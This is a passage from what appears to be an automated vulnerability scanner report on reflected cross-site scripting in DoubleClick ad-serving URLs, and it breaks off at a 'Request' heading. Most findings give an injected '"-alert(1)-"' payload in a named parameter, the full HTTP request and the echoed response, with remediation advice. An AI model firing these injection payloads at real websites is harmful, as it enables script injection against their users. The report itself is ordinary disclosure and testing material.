application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 18:00:37 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7380
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/f/1af/%2a/y%3B235597078%3B0-0%3B0%3B59420406%3B3454-728/90%3B40452821/40470608/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l1e1d6"-alert(1)-"ec3e2d54ab7&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQt ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0d68"-alert(1)-"3566a8a2c18 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B4988140.18;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=e0d68"-alert(1)-"3566a8a2c18 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636642&flash=10.2.154&url=http%3A%2F%2Flocalhost%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615968703&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615968724&frm=0&adk=1607234649&ga_vid=972795648.1297615969&ga_sid=1297615969&ga_hid=295279311&ga_fc=0&u_tz=-360&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&ref=http%3A%2F%2Flocalhost%2F&fu=0&ifi=1&dtd=52&xpc=9d1f6bXzju&p=http%3A//localhost Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7444 Cache-Control: no-cache Pragma: no-cache Date: Sun, 13 Feb 2011 16:56:01 GMT Expires: Sun, 13 Feb 2011 16:56:01 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=e0d68"-alert(1)-"3566a8a2c18http://www.hilton.com/en/hi/promotions/hiromance/index.jhtml?WT.mc_id=zWHWAAA0US1HH2DMH3DCDA4Romance7BR840908&cssiteid=1004575&csdartid=5784215540412926"); var fscUrl = url; var fscUrlClickTagFound = ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a331"-alert(1)-"e0cdeb316aa was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B4988140.18;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE3a331"-alert(1)-"e0cdeb316aa&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=;ord=1312776792? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636642&flash=10.2.154&url=http%3A%2F%2Flocalhost%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615968703&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615968724&frm=0&adk=1607234649&ga_vid=972795648.1297615969&ga_sid=1297615969&ga_hid=295279311&ga_fc=0&u_tz=-360&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&ref=http%3A%2F%2Flocalhost%2F&fu=0&ifi=1&dtd=52&xpc=9d1f6bXzju&p=http%3A//localhost Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 16:53:31 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7498
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... JbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE3a331"-alert(1)-"e0cdeb316aa&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.hilton.com/en/hi/promotions/hiromance/index.jhtml%3FWT.mc_id%3DzWHWAAA0US1HH2DMH3DCDA4Romance7BR84090 ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae9e7"-alert(1)-"52a73db6d13 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B4988140.18;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912ae9e7"-alert(1)-"52a73db6d13&adurl=;ord=1312776792? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636642&flash=10.2.154&url=http%3A%2F%2Flocalhost%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615968703&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615968724&frm=0&adk=1607234649&ga_vid=972795648.1297615969&ga_sid=1297615969&ga_hid=295279311&ga_fc=0&u_tz=-360&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&ref=http%3A%2F%2Flocalhost%2F&fu=0&ifi=1&dtd=52&xpc=9d1f6bXzju&p=http%3A//localhost Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 16:55:29 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7498
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... sb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912ae9e7"-alert(1)-"52a73db6d13&adurl=http%3a%2f%2fwww.hilton.com/en/hi/promotions/hiromance/index.jhtml%3FWT.mc_id%3DzWHWAAA0US1HH2DMH3DCDA4Romance7BR840908%26cssiteid%3D1004575%26csdartid%3D5784215540412926"); var fscUrl = url;
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c264c"-alert(1)-"2c841495697 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B4988140.18;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1c264c"-alert(1)-"2c841495697&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=;ord=1312776792? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636642&flash=10.2.154&url=http%3A%2F%2Flocalhost%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615968703&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615968724&frm=0&adk=1607234649&ga_vid=972795648.1297615969&ga_sid=1297615969&ga_hid=295279311&ga_fc=0&u_tz=-360&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&ref=http%3A%2F%2Flocalhost%2F&fu=0&ifi=1&dtd=52&xpc=9d1f6bXzju&p=http%3A//localhost Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 16:54:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7498
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... Wxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1c264c"-alert(1)-"2c841495697&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.hilton.com/en/hi/promotions/hiromance/index.jhtml%3FWT.mc_id%3DzWHWAAA0US1HH2DMH3DCDA4Romance7BR840908%26cs ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd1fa"-alert(1)-"b1a0019d98f was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B4988140.18;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQcd1fa"-alert(1)-"b1a0019d98f&client=ca-pub-4063878933780912&adurl=;ord=1312776792? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636642&flash=10.2.154&url=http%3A%2F%2Flocalhost%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615968703&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615968724&frm=0&adk=1607234649&ga_vid=972795648.1297615969&ga_sid=1297615969&ga_hid=295279311&ga_fc=0&u_tz=-360&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&ref=http%3A%2F%2Flocalhost%2F&fu=0&ifi=1&dtd=52&xpc=9d1f6bXzju&p=http%3A//localhost Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 16:54:49 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7498
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... L2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQcd1fa"-alert(1)-"b1a0019d98f&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.hilton.com/en/hi/promotions/hiromance/index.jhtml%3FWT.mc_id%3DzWHWAAA0US1HH2DMH3DCDA4Romance7BR840908%26cssiteid%3D1004575%26csdartid%3D578421554 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46e56"-alert(1)-"c4ad023023d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B4988140.18;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L46e56"-alert(1)-"c4ad023023d&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=;ord=1312776792? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636642&flash=10.2.154&url=http%3A%2F%2Flocalhost%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615968703&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615968724&frm=0&adk=1607234649&ga_vid=972795648.1297615969&ga_sid=1297615969&ga_hid=295279311&ga_fc=0&u_tz=-360&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&ref=http%3A%2F%2Flocalhost%2F&fu=0&ifi=1&dtd=52&xpc=9d1f6bXzju&p=http%3A//localhost Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 16:53:01 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7498
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/f/1c4/%2a/x%3B235706078%3B0-0%3B0%3B57842155%3B3454-728/90%3B40412926/40430713/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=L46e56"-alert(1)-"c4ad023023d&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhl ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f8f"-alert(1)-"d4934f0edbb was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5552.3159.GOOGLECN.COM/B5038686.14;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=Bm0YrwPlXTaPXO4L1lAfCjYCbC_6XpoMCpr725RvW-8TeXwAQARgBIL7O5Q04AFDprPy_B2DJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBVWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912&adurl=12f8f"-alert(1)-"d4934f0edbb HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297632807&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fuser-agent-http-header-xss-example-poc-wwwamazoncom.html&dt=1297611207654&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297611207770&frm=0&adk=1607234649&ga_vid=713314446.1297611208&ga_sid=1297611208&ga_hid=928535827&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=994&bih=1010&fu=0&ifi=1&dtd=243&xpc=Jlysl0HKZD&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7347 Cache-Control: no-cache Pragma: no-cache Date: Sun, 13 Feb 2011 15:36:56 GMT Expires: Sun, 13 Feb 2011 15:36:56 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... VzL2h0bWwvdXNlci1hZ2VudC1odHRwLWhlYWRlci14c3MtZXhhbXBsZS1wb2Mtd3d3YW1hem9uY29tLmh0bWyYAtwLuAIYwAIGyALml4sZqAMB9QMAAADE&num=1&sig=AGiWqtyxcVoJoAnQsKrfZWMFzSEJ9iPZXA&client=ca-pub-4063878933780912&adurl=12f8f"-alert(1)-"d4934f0edbbhttps://www.hiltonhhonors.com/landingpages/MoreNightsPoints.aspx?lang=EN&WT.mc_id=zWHWABB0US1HN2DMH3DCDA4MNMP7HE840268&cssiteid=1004575&csdartid=5808780039988527"); var fscUrl = url; var fscUrlClickT ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2c86"-alert(1)-"c09914b1c27 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
